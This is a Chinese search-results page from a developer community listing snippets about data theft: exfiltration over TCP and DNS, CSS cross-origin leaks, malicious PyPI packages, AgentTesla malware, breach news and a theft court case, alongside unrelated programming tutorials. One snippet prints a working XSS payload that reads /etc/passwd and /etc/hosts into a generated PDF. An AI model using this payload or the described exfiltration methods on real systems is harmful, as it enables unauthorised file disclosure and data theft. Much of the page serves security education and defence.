- 综合排序
- 最热优先
- 最新优先
- 来自专栏网络安全
攻防实战:数据窃取技术详解
一、概述(Overview)数据窃取是指未经授权地、隐蔽地将敏感数据从受控的内部网络复制并转移到攻击者控制的外部位置的过程。 网络犯罪分子攻击公司的目的各异,但多数情况下最终目标是数据泄露,即将窃取的敏感数据在暗网出售或公开。 二、数据窃取的核心用途(CoreUseCasesofDataExfiltration)直接窃取数据(DirectDataTheft/TraditionalExfiltration):-**场景**:将收集到的敏感数据从组织网络单向移出到攻击者控制的服务器 通常涉及持续的数据发送和接收。三、基于常见网络协议的数据窃取技术#####A.TCP套接字窃取(TCPSocketExfiltration)原理与适用场景:直接利用TCP套接字建立连接并传输数据。 DNS数据窃取(DNSDataExfiltration)DNS数据窃取是一种将敏感数据编码后,通过一系列DNS查询发送到攻击者控制的DNS服务器的网络攻击。
56541编辑于 2025-12-31 - 来自专栏Khan安全团队
XSS 从 PDF 中窃取数据
<script>x=newXMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>
33910编辑于 2025-04-28 - 来自专栏怀英的自我修炼
《Spring实战》摘录 - 11
Spittle ” + i, new Date())); } return spittles; } 102 问题: #5.3-1 | Spring MVC允许以多种方式将客户端中的数据传送到控制器的处理器方法中
89820发布于 2019-05-08 - 来自专栏云头条
窃取结算密钥、编写非法结算程序,15 个月窃取 608 万:三人分别被判 11 年、10 年、缓刑
罗某某在工作期间发现PP租车公司与某支付机构之间的资金结算交易、对账系统存在管控漏洞,遂通过其窃取的PP租车公司与某支付机构的资金结算密钥,编写相应的非法结算程序密钥,冒充PP租车公司身份,向某支付机构发送资金结算请求 2015年5月至2016年2月期间,由罗某某制作后台程序,李某购买虚拟服务器、银行卡,并利用上述漏洞向某支付机构发送虚假的转账请求,分多次从PP租车公司窃取共计人民币3687948元;2016年3月至7 月期间,罗某某采用上述方法继续从PP租车公司窃取人民币2394014元,并指使庄某在本市多处的ATM取款机上取现共计人民币一百余万元。 法院裁决: 罗某某单独或伙同李某以非法占有为目的,秘密窃取公司钱款,数额特别巨大,其二人的行为均已构成盗窃罪,应予惩处;庄某明知是犯罪所得而予以转移,情节严重,其行为已构成掩饰、隐瞒犯罪所得罪,应予惩处 罗某某、李某的主观目的在于利用系统存在的漏洞,通过窃取密匙、冒充公司身份发送资金结算请求的方式,达到非法占有公司钱款的目的,其二人对计算机的操作仅是犯罪手段以及掩盖犯罪事实的方法,故应当以盗窃罪追究其二人的刑事责任
75140编辑于 2022-03-18 - 来自专栏JavaEdge
数据中台实战(11)-数据中台的数据安全解决方案
如何解决数据误删除 如何解决敏感数据泄露 如何解决开发和生产物理隔离 1 数据备份与恢复 数据中台的数据几乎都存储在HDFS,即使实时数据(存储于Kafka),也会归档HDFS,因为要保存历史数据进行回算或补数据 案例 如有三个数据块,分别存储1、2和3。担心其中一个数据块坏了,丢失内容。所以增加一个块,这块存储内容是前面三个数据块之和。若任一数据块坏了,可根据现有数据块计算出丢失的数据块内容。 平台也提供一键恢复功能,系统自动帮数据开发创建任务和表,拷贝数据从冷备集群到线上集群。 什么样数据应备份? 数据的备份策略应和数据资产等级打通,对核心数据资产,数据中台应强制备份。 对一天以上数据恢复,建议采取基于冷备集群的数据备份来恢复。 3 精细化的权限管理 避免敏感数据泄露。数据权限是数据中台实现数据复用的前提和必要条件。 当数据开发要对数据测试时,可同步生产环境的局部数据(部分分区),数据会脱敏。
1.2K50编辑于 2023-10-08 - 来自专栏EdisonTalk
MongoDB入门实战教程(11)
1 读数据关注的两个问题 在通过mongodb读取数据时,我们一般需要关注两个问题: (1)从哪里读取? (2)什么样的数据可以被读取? 最后,在内容管理场景中,将用户上传的图片分发到全世界(比如多数据中心的场景),可以配置为nearest,让各地用户能够就近读取数据。 readConcern 类似于传统关系型数据库的隔离级别,它的可选项包括: (1)available:读取所有可用的数据 (2)local:读取所有可用且属于当前分片的数据 (3)majority:读取在大多数节点上提交完成的数据 ,立即从从节点读取这条数据,如何才能在不改变方式的前提下保证用户能够读取到刚刚写入的数据? 参考资料 唐建法,《MongoDB高手课》(极客时间) 郭远威,《MongoDB实战指南》(图书) 作者:周旭龙 出处:https://edisonchou.cnblogs.com 本文版权归作者和博客园共有
86630发布于 2021-07-13 - 来自专栏AI智韵
Yolo11实战改进:一文读懂Yolo11到实战
3、参数更少,精度更高:凭借模型设计的进步,在数据集上实现了更高的平均精度均值(),同时使用的参数比少,从而在不影响精度的前提下提高了计算效率。 warmup_bias_lr (float) 预热初始偏置学习率 model (str, 可选) 模型文件路径,例如 yolov8n.pt, yolov8n.yaml data (str, 可选) 数据文件路径 用于数据加载的缓存 device (int 、str、 list, 可选) 运行设备,例如 cuda device=0 或 device=0,1,2,3 或device='0,1,2,3 '或 device =cpu workers (int) 数据加载的工作线程数(如果使用 DDP,则为每个 RANK) project (str, 可选) 项目名称 name (str, 可选) 实验名称,结果保存在 'project verbose (bool) 是否打印详细输出 seed (int) 用于可重复性的随机种子 deterministic (bool) 是否启用确定性模式 single_cls (bool) 将多类数据训练为单类
5.4K10编辑于 2024-11-18 - 来自专栏FreeBuf
防范数据窃取从了解其手法做起
数据窃取是针对组织攻击链中的最后一个阶段。攻击者窃取数据的技术可谓花样百出,网上也有大量关于数据窃取方面的技术文档以及工具。 工欲善其事必先利其器,防范数据窃取必须先熟悉其使用的手段。文中所提及的大多数技术涉及直接的内部到外部数据窃取。需要说明的是这并不是一个完整版本,如果你知道的更多,那么请在评论处留言并告知我们! Anon paste站点例如pastebin甚至是github,都为我们提供了一个数据窃取的简易通道。许多技术组织通常都会允许Github的使用。 https://www.darknet.org.uk/2016/11/pyexfil-python-data-exfiltration-tools/ 远程桌面通常可用于映射磁盘和剪贴板,即便被限制,我们也可以使用 www.wired.com/2017/02/malware-sends-stolen-data-drone-just-pcs-blinking-led/ 磁:ODINI和MAGNETO攻击可以利用计算机处理器产生的磁信号来窃取数据
73530发布于 2018-08-21 - 来自专栏安恒网络空间安全讲武堂
用css绕过同源策略跨域窃取数据
font-family属性的值,即单引号内的,所 以这也将成为一个前置条件,那就是要窃取的数据中不能同时出现单双引号。 最后我们就 可以通过这样的方式完成跨域窃取敏感信息,数据甚至可能包含csrf所需的token,或者更敏感的个人信息。 攻击的一些前提约束 要窃取的数据必须在payload1和payload2之间。 要窃取的数据不能同时存在单引号和双引号,否则会破坏解析的结构。 (数据最后要被解析为css一个属性的值) 要窃取的数据不能包含换行符(css值不支持多行) 这些条件在现代的编码风格下是很难遇到,尤其是不允许出现换行。 我们需要一个可以写任意字符串的属性,这样才能导入我们要窃取的数据。”font-family”是最佳的选择。
1.5K90发布于 2018-02-06 - 来自专栏网络安全
DeepSeek 恶意 Python 包,正在窃取你的数据
研究人员发现,Python 软件包索引(PyPi)中植入了恶意的、模仿 DeepSeek 的软件包,这些代码实际上携带着信息窃取程序。 研究人员指出,“deepseeek” 和 “deepseekai” 在执行时会释放信息窃取程序,以窃取敏感数据,包括 API 密钥、数据库凭证和权限。
51910编辑于 2025-02-06 - 来自专栏大数据文摘
“窃取用户数据”?看阿里如何应对
支付宝与付费通终止合作后,网上突然出现很多支付宝“窃取用户数据”的言论。商务合作终止固然遗憾,但“盗窃”的罪名更重大,尤其是涉及到大家非常关注的数据问题。 毫无疑问我们非常看重数据,数据将会成为改善全社会商业环境的重要资源,我们坚信数据的力量和价值。阿里巴巴从五年前就确定“开放的数据平台”作为自己的战略目标,并且重兵布局云计算和大数据。 基于这样的理解,我们认为数据的商业价值在于运用而不在控制,我们认为数据只有在交换、分享中才能发挥更大的价值,数据会越用价值越高。因此,我们并不担心获取数据的途径,更绝不会用不光彩的手段去获取数据! 如何有效地发挥这些数据的价值,建立一种数据交换以及数据标准的能力,我们的思考才刚刚开始。 4、大数据是无数用户的个体数据积累起来的,但看起来运用和发挥数据价值似乎变成了大机构的专利。这其中如何具体保护客户的隐私和利益?大数据对于每个人的价值又在哪里?
69950发布于 2018-05-21 - 来自专栏火绒安全
AgentTesla病毒解析:利用钓鱼邮件窃取终端隐私数据
当用户被诱导点击运行病毒后,病毒即会窃取用户终端上的隐私数据并上传C&C服务器。 ͼƬ2.png AgentTesla病毒样本通常使用混淆器,通过数据加密、代码加密、控制流混淆等多种混淆方式藏匿自身病毒特征,对抗安全软件查杀。 AgentTesla病毒的主要危害是窃取用户终端中的隐私数据,隐私数据包括用户浏览器登录凭证、FTP软件登录凭证、电子邮件登录凭证、键盘记录信息、屏幕截图、用户系统配置信息等。
73620编辑于 2022-05-20 - 来自专栏达达前端
springboot第11集:Spring Boot整理大纲与数据结构实战
什么是数据库管理系统?什么是SQL?他们之间的关系是什么? 数据库: 英文单词DataBase,简称DB。按照一定格式存储数据的一些文件的组合。 顾名思义:存储数据的仓库,实际上就是一堆文件。 这些文件中存储了 具有特定格式的数据。 数据库管理系统: DataBaseManagement,简称DBMS。 数据库管理系统是专门用来管理数据库中数据的,数据库管理系统可以 对数据库当中的数据进行增删改查。 DBMS--执行--> SQL --操作--> DB 先安装数据库管理系统MySQL,然后学习SQL语句怎么写,编写SQL语句之后,DBMS 对SQL语句进行执行,最终来完成数据库的数据管理。 怎么选择使用某个数据库呢? mysql> use test; Database changed 表示正在使用一个名字叫做test的数据库。 怎么创建数据库呢?
45130编辑于 2023-10-08 - 来自专栏悟空聊架构 | 公众号
11. SpringCloud实战项目-初始化数据库和表
SpringCloud实战项目全套学习教程连载中 PassJava 学习教程 简介 PassJava-Learning项目是PassJava(佳必过)项目的学习教程。对架构、业务、技术要点进行讲解。 04.安装Docker 05.Docker安装mysql 06.Docker安装redis 07.本地开发环境配置 08.配置Git 09.初始化项目和添加微服务 10.PassJava-微服务划分图 11 .初始化数据库和表 12.搭建管理后台 PassJava 初始化数据库表 用PowerDisigner工具创建数据库 用PowerDisigner工具创建数据库 ? 总共有5个微服务数据库:内容、学习、渠道、用户、题目 ? 内容微服务的数据库 ? 学习微服务的数据库 ? 渠道微服务的数据库 ? 用户微服务的数据库 ? 题目微服务的数据库 ? SQL文件在这个项目里面:https://github.com/Jackson0714/PassJava-Platform.git ?
60221发布于 2020-04-16 - 来自专栏玄魂工作室
CTF实战11 任意下载漏洞
许多网站开放下载文件功能,由于下载功能代码对下载文件类型、目录未做限制或限制不当,导致攻击者可下载服务器任意文件 这个漏洞的原理很简单,我们现在说说攻击思路 攻击思路 下载web源码 通过下载web源码我们可以获得 数据库配置文件 ,然后可以通过远程数据库链接工具、在线数据库管理工具等链接获取数据库控制权 之后可以 1. 拖库、篡改数据库 2. 获取数据库信息而一步攻击 3. 最后上面两种都不行那就直接数据库提权吧 其他源代码 下载到了没有数据库配置文件的源代码,我们可以做的有 分析源代码,寻找漏洞,进一步攻击 或者还有一种 服务器敏感文件 我们可以下载passwd、shadow
1.1K30发布于 2018-07-25 - 来自专栏图像识别与深度学习
《HTML5实战》Lesson11
Week12 2016/11/30上午1-4节 一、复习 二、使用地图 1、window.navigator 对象包含有关访问者浏览器的信息。
95030发布于 2018-04-27 - 来自专栏非著名运维
企业实战(11)消息队列之Docker安装部署RabbitMQ实战
什么叫消息队列 消息(Message)是指在应用间传送的数据。消息可以非常简单,比如只包含文本字符串,也可以更复杂,可能包含嵌入对象。 7.Channel 信道,多路复用连接中的一条独立的双向数据流通道。 3.运行rabbitmq容器 -d:后台运行容器 --name:指定容器名 -p:指定服务运行的端口(5672:应用访问端口;15672:控制台Web端口号) -v:映射目录或文件,启动了一个数据卷容器 ,数据卷路径为:/var/lib/rabbitmq,再将此数据卷映射到住宿主机的/data目录 --hostname:主机名(RabbitMQ的一个重要注意事项是它根据所谓的 “节点名称” 存储数据, 15672:15672 -p 5672:5672 rabbitmq:management 8232a3af368dad3f7f193c650c29e7668e67ce04489933ee3c26b0d11e1df26a
1.2K30编辑于 2022-06-22 154个数据库被黑客窃取?ASML回应
该黑客声称,此次窃取的信息涵盖多类敏感数据,包括磁盘加密密钥、用户数据(用户名/密码)、软件信息以及特定设备的详细信息。 如果消息属实,这将远远超出一般的客户数据泄露事件,将会对ASML公司带来严重的负面影响。这意味着攻击者攻破了ASML的安全系统,并可以访问ASML公司高度敏感的数据。 不过,ASML在最新发布的声明中否认了公司遭黑客窃取数据的说法。 “ASML注意到2026年1月6日在BreachForums上发布的一篇帖子,该帖子声称公司信息被泄露。 所提及的文档中没有来自ASML的数据。”ASML在声明中写道。 第三方的安全研究团队经过分析后也认为,黑客“1011”兜售的所谓ASML的数据实际上毫无用处。 此外,研究人员还发现,黑客“1011”与本周早些时候宣布NordVPN数据泄露的攻击者是同一人。NordVPN公司随后也否认丢失任何数据,该公司代表称这些说法“不实”。
8810编辑于 2026-03-19浏览器“隐私”扩展被曝窃取AI对话数据
浏览器“隐私”扩展被曝窃取AI对话数据据Koi Security的研究报告,四款声称保护隐私的流行浏览器扩展程序实则背道而驰。 这些恶意插件一直在窃取超过800万用户的聊天机器人对话文本,并将其发送回开发者。 达迪克曼解释道,数据收集功能通过硬编码的配置标志默认启用。“没有面向用户的开关可以禁用此功能。停止数据收集的唯一方法是彻底卸载该扩展。” 他说,“要么是审核没有检查从某中心自家AI产品(Gemini)窃取对话的代码,要么是检查了但不认为这是个问题。” 该政策允许在有限场景(例如安全或业务所有权变更)下将数据传输给第三方,但这些场景不包括将数据传输给数据代理。
32210编辑于 2026-01-01- 来自专栏数据猿
美国大规模窃取全球数据 该用什么来保障中国数据安全?
斯诺登曾说不想生活在一个一言一行都被记录的世界,但近十年来,美国的窃取数据行动不断被曝光,中国的数据安全又将走向何方? 数据监视又被曝光 近期,一份由新媒体“安在”披露的报告显示,美国国家安全局利用“无界线人”(BOUNDLESSINFORMANT)系统在30天内远程窃取970亿条全球互联网数据记录 (DNI) 和1240 美国的窃取数据丑闻不止于此,自2013年斯诺登曝光棱镜计划开始,美国的数据窃取行为就如同浮出的冰山一角,其水下的庞大组织逐渐曝光。 在已公布的资料中,中国目前主要面临三种数据窃取风险。 图源:维基百科 首先是技术上的攻击,不同的技术将针对不同的通信环节。 中国信创产业政策 可以预见,接下来围绕数据安全的全球攻防战,将愈发激烈。美国系统性攻击他国网络、窃取他国数据的行为,将会持续进行。
1K30编辑于 2022-09-04
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号